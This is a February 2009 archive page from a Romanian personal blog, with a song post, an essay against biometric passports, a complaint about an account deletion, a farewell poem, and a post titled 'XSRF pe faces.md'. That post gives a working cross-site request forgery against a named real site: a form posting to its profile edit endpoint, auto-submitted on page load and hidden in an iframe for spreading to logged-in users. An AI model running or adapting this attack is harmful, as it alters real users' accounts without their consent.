Monthly Archives: February 2009

smile….mother fucker… smile…

si dacă e ora 8:00… am nevoie de un cântec al zilei…. și dacă tot am citit că angajatul român este mai obosit, bolnav și cu salariu mic

putin optimism pentru ziua de azi…. de la smile (l-am găsit pe blogu lu cineva care vrea aripi să zboare)

smile….mother fucker… smile… mă duc la lucru…
:) >-

666

am citit cateva articole despre noile pașapoarte biometrice care se vor implementate în România. Știrile sunt luate de pe www.gîndul.info … și niște linkuri către ele: 

Deci nu prea m-am informat de pe net ce ar însemna tot acest proces… Folosind doar informația dată de un ziar prin articolele sale.

Am înțeles faptu România este impusă de SUA și UE să implementeze aceste noi tipuri de pașapoarte. hmmmm…. oare nu se pare cam straniu??? de ce ar vrea SUA/UE să facă asta? Singurul argument pe care l-am aflat din articole ar fi precum că: ”Guvernul a fost categoric și a păstrat măsura, explicând avantajele folosirii unui astfel de pașaport cu mai multe elemente de siguranță, în special securizarea documentului și călătoria fără viză în SUA”… la partea cu securitatea documentului revin mai tîrziu…. dar… ”călătoria fără viză în SUA” – chiar mi se pare aberantă. Am impresia ca america se pregătește ca toată populația pamîntului să se mute la ea… sau să se extindă??? că nu cred ca încăpem toți acolo… interesant… Și dacă am fi mai realiști: câte procente din populația totală a României vrea să plece în SUA??? sunt sigur ca vreo 50% nici nu știu unde se află măcar… 

Făcînd o paralelă, mi se pare că e fix ca în cazul în care un străin îi dă o bomboană unei fetițe de 6 ani ca să urce la el în mașină. :( Prin toată kestia asta eu văd doar un ”mic” sacrificiu din partea celei mai mari puteri ale lumii pentru a obține informații (in format digital) asupra tuturor oamenilor. Deja kestia asta mie nu mi se mai pare a democrație și libera alegere a ceea ce vrei să faci. Vreau să trăiesc fără sa fac parte din anumite liste al celora care se ”gândesc” la mine zi și noapte. Recunosc, că o bază de date cu informațiile despre toți oamenii sunt informații foarte delicate și chiar sunt de părerea că astfel de informații nu treb să fie centralizate. Aceste informații dau o mare putere celui care le deține. Un exemplu simplu: cel care le deține poate face anumite prelucrari statistice peste ele, obținînd informații foarte fixe cu o marjă mică de eroare. Este ca și cum aș face o statistică despre…. să zicem… vârsta medie a populației din localitatea X. În acest caz, există deja informațiile despre toți indivizii din mulțimea respectivă, astfel că nu se mai aplică statistica tradițională de a alege un eșantion semnificativ, și asta duce la o precizie foarte mare a rezultatului. Acum, această noua valoare aflată se poate folosi în alte scopuri… Dacă, de exemplu, în localitatea X populația ar avea media de vârstă de 20-25 de ani, ceea ce ar fi foarte tânără, atunci, aș putea desfășura acolo activități (foarte profitabile) care ar folosi resursele locale (ex: aduc acolo mai multa bere, dau mai multe credite, ș.a.)… Atunci omul nu va mai fi privit ca o personalitate… ci ca o resursă ce așteapta a fi exploatată.

Această modalitate lasă pe alții să ”gândească” în locul meu despre ceea ce aș vrea să fac fără a mă lăsa pe mine să gândesc ce vreau eu efectiv să fac, pentru că în majoritatea cazurilor suntem împinși să facem anumite lucruri din constrângerile externe (degeaba vreau eu sa plec pe lună dacă…). 

Acum cred că mai mult se duce lupta pentru aceste informații date de noile pașapoarte biometrice și țara/organizația pe care le va obține va obține și o foarte mare putere în mâinile sale. Partea cu securitatea și teroriștii mi se pare aberantă și ar reprezinta un motiv doar vizibil și palpabil pe care trebuie să îl înghită cei care își dau acordu să își facă noile pașapoarte. Oricum, acum ca să îmi fac orice document trebuie să aduc caziere judiciare…. 1000 (poate ar fi bine deja să mă abonez la ei… să îmi dea lunar câte unu :) ) și nu cred că asta se va schimba vreodată. Și mai știu și că au fost multe cazuri de ”terorism” făcute de persoane care erau considerate îngeri și nici o dată nu au avut probleme cu legea… și nici părinții lor n-ar fi crezut niciodată ca copii lor ar face așa ceva…. deci… vorbe goale… 

Pe lângă toate ”avantajele” pe care le-aș avea de la noul pașaport biometric, mai trebuie să și plătesc din buzunarul meu cu (266-96,2 = 169,8Ron) 169,8Ron mai mult… hmmm… nici asta nu mi se pare normal… adic treb să și platesc pentru a face parte din lista celora care se ”gândesc” la mine…. NOOOOOOOOOOOOOOOOOOOOOOOOOOT…

Din ceea ce am citit… mulți oameni se bazează pe numărul 666, care ar fi un număr cu nu prea bună reputație și oameni din parlament/guvern stau și se uită unul la celălalt… dau din umeri… ”cifra 666 nu ar putea fi exclusă”… :( … mdea… ei sunt aleșii poporului… și sunt obligați să ia o hotărîre…

Fraza care mi-a plăcut: ”Nu putem să nu credem în numere. Chiar CNP-ul este un număr care ne identifică” (Varujan Vosganian). ceea ce mi se pare foarte real… și adevărat… pentru ca în acest univers totul se poate deduce la o ecuație de ordinu 2… offf… iar numere… :)

Deci… sunt doar părerile mele… citit… ceea ce scrie… și nu am mai multe informații… am scris ceea ce cred… și sunt pesimist…

odnoklassniki.ru sucks

Dupa ce am fost anuntat ca mi se sterge accountu… si mau pus sa imi schimb toate credentialele de la ei pe site, caci, cica, am calculatoru infectat si de pe accountu meu s-a trimis spam…. ma mai trezesc si cu mesaje interesante, gen:

serjsi nici prea multe mesaje la persoane necunoscute nam trimis… cred ca e vreo politica de-a lor… sa iti shtearga accountu, ca sa te oblige sa iti faci altu… cu plata…

ggg :x

XSRF pe faces.md

sa incepem cu simplu… CSRF = Cross-Site Request Forgery. Mai multe detalii gasiti pe google… 

Despre XSRF pe siteul www.faces.md (ca tot stau cu zilele pe el). M-am uitat cam la toate formele de prin faces… si ma gindeam unde as putea sa aplic si eu noile cunostinte (nu chiar noi, doar ca acuma au primit o denumire oficiala :) ). Cautat… cautat… si… de ce nu sa fac putina reclama la puk-u’ ista a meu…. Deci… pe pasi:

intrat pe www.faces.md …

logat cu useru meu… 

intrat la “Profile Data” si de acolo la “Description”. 

In pagina deschisa se poate seta Titlul si Descrierea profilului…. Si de aici se incepe si vulnerabilitatea. Am deschis sursa paginii… cautat forma unde se face introducerea datelor, am simplificato putin… si rezultatul final este:

<form id="step4" action="http://www.faces.md/profile/edit/step/4" method="post">
        <input id="descriptionTitleId" class="tc_txtr_inp"
               onclick="document.getElementById('selectedArea').value = 'descriptionTitleId';"
               name="descriptionTitle" type="hidden" value="husanu" />
	<input id="descriptionId" class="tc_txtr"
               onclick="document.getElementById('selectedArea').value = 'descriptionId';"
               name="description" type="hidden" value="http://www.puk.ro" />
	<input id="selectedArea" type="hidden" value="descriptionId" />
</form>

la parametrii formei am adaugat un ID=”step4″, pentru a-l folosi in continuare. Acum, avand aceasta forma simplificata, putem apela submit(); astfel ca modificarile se vor face asupra utilizatorului curent care e logat in calculator. Pentru a juta userul, ca sa nu se chinui sa mai apese SUBMIT, cream o pagina HTML simpla, si atasam tagului <body> evenimentu:

onload = “document.getElementById(‘step4′).submit()”

astfel…. odata ce se incarca pagina…. se vor face modificarile necesare asupra profilului (in cazul ca este logat userul pe faces.md). 

Respectivul cod, mai apoi se poate ascunde intr-un IFRAME, astfel incat sa nu sara in ochi o pagina care te redirecteaza catre www.faces.md … si voila… acu dam linku tuturor de pe www.faces.md …

picture-1

Pentru exemplificare, am creat pagina http://a.puk.ro , care contine un frame care incarca pagina ce face submit.

Intrucat, www.faces.md sunt frati cu cei de la www.neogen.ro …. cred ca se reproduce problema si la ei :)

Enjoy

La revedere

Pa, răsărit fericit

Ce e urmat de apus

Pa, cer senin şi liniştit

Că vine ploaia cea de sus

Pa, zimbet fermecător

Căci vei deveni amăgitor

Pa , fluturaşi şi libelule

N-a mai rămas nimic pe lume

Pa, iubirea adevărată

De trădare eşti marcată

Pa, frumuseţe exterioară

Că vine brătrineţea şi te omoară

Pa, suflet destrămat

Ştii că nu vei fi vindecat

Pa , destin sau soartă

Mi s-a deschis o altă poartă

Pa , umbra trecutului

Vine intunericul viitorului .

robloqhusanubv5@mailld.com